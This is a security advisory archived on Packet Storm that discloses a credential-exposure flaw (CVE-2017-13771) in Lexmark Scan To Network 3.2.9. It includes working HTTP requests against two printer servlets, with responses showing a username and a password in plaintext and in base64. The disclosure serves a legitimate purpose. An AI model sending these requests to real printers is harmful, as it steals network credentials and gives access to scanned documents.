what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Lexmark Scan To Network (SNF) 3.2.9 Information Disclosure

Lexmark Scan To Network (SNF) 3.2.9 Information Disclosure
Posted Sep 1, 2017
Authored by Daniel Correa

Lexmark Scan to Network (SNF) printer application versions 3.2.9 and below suffer from a credential disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2017-13771
SHA-256 | 7f5304f38d1716d8fb15c58a74fb0d5b46d16decfb997800f2709540f89301e5

Lexmark Scan To Network (SNF) 3.2.9 Information Disclosure

Change Mirror Download
Summary
=======
1. Information exposure of network credentials in embedded printer
application (CVE-2017-13771)


Vendor
======
"Lexmark creates innovative imaging solutions and technologies that help
customers worldwide print, secure and manage information with ease,
efficiency and unmatched value. Combining innovative technologies with deep
industry expertise, Lexmark simplifies the complex intersection of digital
and printed information in retail, financial services, healthcare,
manufacturing, education, government and more." [1].


Tested version
==============
Lexmark Scan To Network (SNF) application <= 3.2.9


Vulnerabilitiy and PoC
=======================
"The Embedded Scan to Network solution is an embedded Java application that
is installed as a flash file on multifunction printers (MFPs) which support
the Lexmark Embedded Solutions Framework (LeSF). It allows users at the
printer to scan their documents to network destinations specified by the
network administrator" [2].

Scan To Network application supports the configuration of network
credentials and if used they will be stored in plaintext and transmited in
every request to the configuration tab. The next request should be made to
get plaintext credentials that could be used later to escalate privileges
in the network or get access to scanned documents:


POST https://host/cgi-bin/direct/printer/prtappauth/apps/snfDestServlet
HTTP/1.1
Host: host
Content-Type: multipart/form-data; boundary=----boundary
Content-Length: 181

------boundary
Content-Disposition: form-data; name="dests"

scanToNet.factory.0
------boundary
Content-Disposition: form-data; name="editButton"

Edit...
------boundary--


HTTP/1.1 200 OK
...
...
<span id="cifs.uName">
<span class="header">Username:</span>
<input type="text" name="cifs.uName" value="TEST" class="control"
maxlength="256"></input>
<span id="cifs.pwd">
<span class="header">Password:</span>
<input type="password" name="cifs.pwd" value="TEST123"
class="control"></input>



It is possible to have too a base64-encoded password from application
configuration export functionality:

GET
https://host/cgi-bin/direct/printer/prtappauth/apps/ImportExportServlet?exportButton=clicked
HTTP/1.1
Host: host


HTTP/1.1 200 OK
...
...
esf.cifs.inst.1.cifs.uName "TEST"
esf.cifs.inst.1.cifs.pwd "VEVTVDEyMw=="


Timeline
========
19/05/2017: Vendor is notified through security email
30/08/2017: No response from vendor, CVE assigned, full disclosure


[1] https://www.lexmark.com/en_us/about/company.html
[2]
http://support.lexmark.com/library/LEXMARK/primus/files/PATTLNK_8312007_1530-AdminGuide.pdf


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close